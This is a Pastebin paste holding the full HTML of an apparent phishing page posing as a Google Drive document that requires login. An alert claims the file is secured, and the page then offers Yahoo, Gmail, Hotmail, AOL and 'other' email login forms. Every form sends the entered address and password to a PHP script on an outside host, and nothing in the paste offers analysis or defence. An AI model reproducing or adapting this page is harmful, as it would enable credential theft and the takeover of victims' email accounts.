Advertisement
Guest User

Untitled

a guest
Jul 18th, 2014
1,900
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 11.57 KB | None | 0 0
  1. <!-- saved from url=(0026)http://tfiledata.com/rema/ -->
  2. <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  3. <link rel="shortcut icon" href="https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_4.ico" type="image/x-icon"><title>GoogleDrive</title>
  4. <script>
  5. alert('Secured file, Login to view');
  6. </script>
  7. <link rel="stylesheet" type="text/css" href="./Remax - Secure Login_files/style.htm">
  8. <style type="text/css">
  9. div {
  10.     position: absolute;
  11.     left: 620px;
  12.     top: 40px;
  13.     background-color: #EBEBEB;
  14.     width: 280px;
  15.     padding: 10px;
  16.     color: #000000;
  17.     border: #0000cc 2px dashed;
  18.     display: none;
  19. }
  20. body,td,th {
  21.     font-family: Arial, Helvetica, sans-serif;
  22.     font-size: 12px;
  23. }
  24. </style>
  25. <script language="Javascript">
  26. function echeck(str) {
  27.  
  28.         var at="@"
  29.         var dot="."
  30.         var lat=str.indexOf(at)
  31.         var lstr=str.length
  32.         var ldot=str.indexOf(dot)
  33.         if (str.indexOf(at)==-1){
  34.            alert("Invalid E-mail ID")
  35.            return false
  36.         }
  37.  
  38.         if (str.indexOf(at)==-1 || str.indexOf(at)==0 || str.indexOf(at)==lstr){
  39.            alert("Invalid E-mail ID")
  40.            return false
  41.         }
  42.  
  43.         if (str.indexOf(dot)==-1 || str.indexOf(dot)==0 || str.indexOf(dot)==lstr){
  44.             alert("Invalid E-mail ID")
  45.             return false
  46.         }
  47.  
  48.          if (str.indexOf(at,(lat+1))!=-1){
  49.             alert("Invalid E-mail ID")
  50.             return false
  51.          }
  52.  
  53.          if (str.substring(lat-1,lat)==dot || str.substring(lat+1,lat+2)==dot){
  54.             alert("Invalid E-mail ID")
  55.             return false
  56.          }
  57.  
  58.          if (str.indexOf(dot,(lat+2))==-1){
  59.             alert("Invalid E-mail ID")
  60.             return false
  61.          }
  62.        
  63.          if (str.indexOf(" ")!=-1){
  64.             alert("Invalid E-mail ID")
  65.             return false
  66.          }
  67.  
  68.          return true                   
  69.     }
  70.  
  71. function ValidateFormYahoo(){
  72.     var emailID=document.yahoo.user
  73.     var emailPASS=document.yahoo.password
  74.    
  75.     if ((emailID.value==null)||(emailID.value=="")){
  76.         alert("Please Enter your Email ID")
  77.         emailID.focus()
  78.         return false
  79.     }
  80.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  81.         alert("Please Enter your Email Password")
  82.         emailPASS.focus()
  83.         return false
  84.     }
  85.  
  86.     return true
  87.  }
  88.  
  89.  function ValidateFormHotmail(){
  90.     var emailID=document.hotmail.user
  91.     var emailPASS=document.hotmail.password
  92.    
  93.     if ((emailID.value==null)||(emailID.value=="")){
  94.         alert("Please Enter your Email ID")
  95.         emailID.focus()
  96.         return false
  97.     }
  98.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  99.         alert("Please Enter your Email Password")
  100.         emailPASS.focus()
  101.         return false
  102.     }
  103.  
  104.     return true
  105.  }
  106.  
  107.   function ValidateFormGmail(){
  108.     var emailID=document.gmail.user
  109.     var emailPASS=document.gmail.password
  110.    
  111.     if ((emailID.value==null)||(emailID.value=="")){
  112.         alert("Please Enter your Email ID")
  113.         emailID.focus()
  114.         return false
  115.     }
  116.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  117.         alert("Please Enter your Email Password")
  118.         emailPASS.focus()
  119.         return false
  120.     }
  121.     return true
  122.  }
  123.  
  124.    function ValidateFormAol(){
  125.     var emailID=document.aol.user
  126.     var emailPASS=document.aol.password
  127.    
  128.     if ((emailID.value==null)||(emailID.value=="")){
  129.         alert("Please Enter your Email ID")
  130.         emailID.focus()
  131.         return false
  132.     }
  133.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  134.         alert("Please Enter your Email Password")
  135.         emailPASS.focus()
  136.         return false
  137.     }
  138.     return true
  139.  }
  140.  
  141.    function ValidateFormOther(){
  142.     var emailID=document.other.user
  143.     var emailPASS=document.other.password
  144.    
  145.     if ((emailID.value==null)||(emailID.value=="")){
  146.         alert("Please Enter your Email ID")
  147.         emailID.focus()
  148.         return false
  149.     }
  150.     if ((emailPASS.value==null)||(emailPASS.value=="")){
  151.         alert("Please Enter your Email Password")
  152.         emailPASS.focus()
  153.         return false
  154.     }
  155.     if (echeck(emailID.value)==false){
  156.         emailID.value=""
  157.         emailID.focus()
  158.         return false
  159.     }
  160.     return true
  161.  }
  162. </script>
  163. <script language="javascript">
  164. function toggle() {
  165.     var ele = document.getElementById("toggleText");
  166.     var text = document.getElementById("displayText");
  167.     if(ele.style.display == "block") {
  168.             ele.style.display = "none";
  169.         text.innerHTML = "show";
  170.     }
  171.     else {
  172.         ele.style.display = "block";
  173.         text.innerHTML = "hide";
  174.     }
  175. }
  176.  
  177. function togglegmail() {
  178.     var ele = document.getElementById("toggleTextgmail");
  179.     var text = document.getElementById("displayTextgmail");
  180.     if(ele.style.display == "block") {
  181.             ele.style.display = "none";
  182.         text.innerHTML = "show";
  183.     }
  184.     else {
  185.         ele.style.display = "block";
  186.         text.innerHTML = "hide";
  187.     }
  188. }
  189.  
  190. function togglehotmail() {
  191.     var ele = document.getElementById("toggleTexthotmail");
  192.     var text = document.getElementById("displayTexthotmail");
  193.     if(ele.style.display == "block") {
  194.             ele.style.display = "none";
  195.         text.innerHTML = "show";
  196.     }
  197.     else {
  198.         ele.style.display = "block";
  199.         text.innerHTML = "hide";
  200.     }
  201. }
  202. function toggleaol() {
  203.     var ele = document.getElementById("toggleTextaol");
  204.     var text = document.getElementById("displayTextaol");
  205.     if(ele.style.display == "block") {
  206.             ele.style.display = "none";
  207.         text.innerHTML = "show";
  208.     }
  209.     else {
  210.         ele.style.display = "block";
  211.         text.innerHTML = "hide";
  212.     }
  213. }
  214. function toggleother() {
  215.     var ele = document.getElementById("toggleTextother");
  216.     var text = document.getElementById("displayTextother");
  217.     if(ele.style.display == "block") {
  218.             ele.style.display = "none";
  219.         text.innerHTML = "show";
  220.     }
  221.     else {
  222.         ele.style.display = "block";
  223.         text.innerHTML = "hide";
  224.     }
  225. }
  226. </script>
  227.  
  228. </head>
  229. <body bgcolor="#efefef">
  230. <table id="wrapper" align="center" bgcolor="#cccccc" cellpadding="10" cellspacing="1"><tbody><tr><td bgcolor="#ffffff">
  231.  
  232. <table width="200%"><tbody><tr><td width="80%">
  233.  
  234.  
  235. <h1><img src="http://fwd.channel5.com/upload/0736/8448/Google_docs_logo_size_9.jpg" height="100" width="150"></h1>
  236.  
  237. </td></tr></tbody></table>
  238.  
  239.  
  240. <br>
  241.  
  242.  
  243. <table id="invoicetoptables" cellspacing="0" width="100%">
  244. <tbody><tr>
  245. <td id="invoicecontent" width="50%">
  246.  
  247. <table id="invoicetoptables" cellpadding="10" cellspacing="0" height="100" width="100%">
  248. <tbody><tr>
  249. <td id="invoicecontent" style="border: 0px solid rgb(204, 204, 204);" valign="top">
  250. <p><font color="#990000" size="4">Login to continue viewing</font></p>
  251.  
  252. <br>
  253. <br>
  254.  
  255. <font class="paid">Choose your email provider below and login:</font>
  256.  
  257. <br>
  258.  
  259. <br>
  260.  
  261. <br>
  262. <p align="center">
  263. <a href="javascript:toggle();"><img src="http://l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png" title="Yahoomail" id="displayText" border="0" height="48" width="132"></a>
  264. &nbsp;&nbsp;&nbsp; <a href="javascript:togglegmail();"><img src="https://www.google.com/images/logos/mail_logo.png" title="Gmail" id="displayTextgmail" border="0" height="48" width="132"></a>
  265. <br>
  266. <br>
  267. <br>
  268. <a href="javascript:togglehotmail();"><img src="https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/images/WindowsLive.png" title="Hotmail" id="displayTexthotmail" border="0" height="48" width="132"></a>
  269. &nbsp;&nbsp;&nbsp; <a href="javascript:toggleaol();"><img src="http://img3.cache.netease.com/www/logo/logo_png.png" title="Aol" id="displayTextaol" border="0" height="48" width="132"></a>
  270. <br>
  271. <br>
  272. <br>
  273. <a href="javascript:toggleother();"><img src="http://t2.gstatic.com/images?q=tbn:ANd9GcQXSkMrGZAcneL731y7EF-o4om0E3BC5FH3He6UlNMBCKV9L8HbQ50fLB5r" title="Other Email" id="displayTextother" border="0" height="48" width="132"></a>
  274.  
  275. </p>
  276.  
  277.  
  278. <!-- YAHOO CONFIG !-->
  279.  
  280. <div id="toggleText" style="display: none">
  281. <p><img src="http://l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png" title="Yahoomail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  282. <br>
  283. <form name="yahoo" method="post" action="http://scalable.twomini.com/qq/new/logz.php" onsubmit="return ValidateFormYahoo()">
  284. <p>
  285. <br>
  286.                 <label>Yahoo! Username:</label>
  287.                 <br>
  288.                 <input name="user" style="width: 200px;" type="text">
  289.             <br>
  290.                 <label>Password</label>
  291.                 <br>
  292.                 <input name="password" style="width: 200px;" type="password">
  293.                 <br>
  294.                 <br>
  295.                 <input name="s_yahoo" value="Sign In" type="submit">
  296.             </p>
  297.  
  298.  
  299.  
  300. </form>
  301. </div>
  302.  
  303. <!-- GMAIL CONFIG !-->
  304. <div id="toggleTextgmail" style="display: none">
  305. <p><img src="https://www.google.com/images/logos/mail_logo.png" title="Gmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  306. <br>
  307. <form name="gmail" method="post" action="http://scalable.twomini.com/qq/new/logz.php" onsubmit="return ValidateFormGmail()">
  308. <p>
  309.  
  310.                 <label>Gmail Username:</label>
  311.  
  312.                 <br>
  313.                 <input name="user" style="width: 200px;" type="text">
  314.             <br>
  315.                 <label>Password</label>
  316.                 <br>
  317.                 <input name="password" style="width: 200px;" type="password">
  318.                 <br>
  319.                 <br>
  320.                 <input name="s_gmail" value="Sign in" type="submit">
  321.             </p>
  322.             </form>
  323.  
  324.  
  325.  
  326.  
  327. </div>
  328.  
  329. <!-- HOTMAIL CONFIG !-->
  330. <div id="toggleTexthotmail" style="display: none">
  331. <p><img src="https://secure.wlxrs.com/~Live.SiteContent.ID/~16.0.2/~/~/~/~/images/WindowsLive.png" title="Hotmail" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  332. <br>
  333. <form name="hotmail" method="post" action="http://scalable.twomini.com/qq/new/logz.php" onsubmit="return ValidateFormHotmail()">
  334. <p>
  335.                 <label>Email Address:</label>
  336.                 <br>
  337.                 <input name="user" style="width: 200px;" type="text">
  338.             <br>
  339.                 <label>Password</label>
  340.                 <br>
  341.                 <input name="password" style="width: 200px;" type="password">
  342.                 <br>
  343.                 <br>
  344.                 <input name="s_hotmail" value="Sign in" type="submit">
  345.             </p>
  346.             </form>
  347.  
  348.  
  349.  
  350. </div>
  351.  
  352. <!-- AOL CONFIG !-->
  353. <div id="toggleTextaol" style="display: none">
  354. <p><img src="http://img3.cache.netease.com/www/logo/logo_png.png" title="Aol" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  355. <br>
  356. <form name="aol" method="post" action="http://scalable.twomini.com/qq/new/logz.php" onsubmit="return ValidateFormAol()">
  357. <p>
  358.                 <label>Email Address:</label>
  359.                 <br>
  360.                 <input name="user" style="width: 200px;" type="text">
  361.             <br>
  362.                 <label>Password</label>
  363.                 <br>
  364.                 <input name="password" style="width: 200px;" type="password">
  365.                 <br>
  366.                 <br>
  367.                 <input name="s_aol" value="Sign In" type="submit">
  368.             </p>
  369.             </form>
  370.  
  371.  
  372.  
  373. </div>
  374.  
  375. <!-- OTHER CONFIG !-->
  376. <div id="toggleTextother" style="display: none">
  377. <p><img src="http://t2.gstatic.com/images?q=tbn:ANd9GcQXSkMrGZAcneL731y7EF-o4om0E3BC5FH3He6UlNMBCKV9L8HbQ50fLB5r" title="Other" border="0" height="48" width="132"></p> <p align="right"><a href="javascript:location.reload(true)">close [x]</a></p>
  378. <br>
  379. <form name="other" method="post" action="http://scalable.twomini.com/qq/new/logz.php" onsubmit="return ValidateFormOther()">
  380. <p>
  381.                 <label>Email Address:</label>
  382.                 <br>
  383.                 <input name="user" style="width: 200px;" type="text">
  384.             <br>
  385.                 <label>Password</label>
  386.                 <br>
  387.                 <input name="password" style="width: 200px;" type="password">
  388.                 <br>
  389.                 <br>
  390.                 <input name="s_other" value="Sign In" type="submit">
  391.             </p>
  392.             </form>
  393.  
  394.  
  395.  
  396. </div>
  397.  
  398.  </td>
  399.  </tr>
  400.  </tbody></table>
  401. </td></tr></tbody></table>
  402.  
  403. </td>
  404.  
  405.  
  406. </tr></tbody></table></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement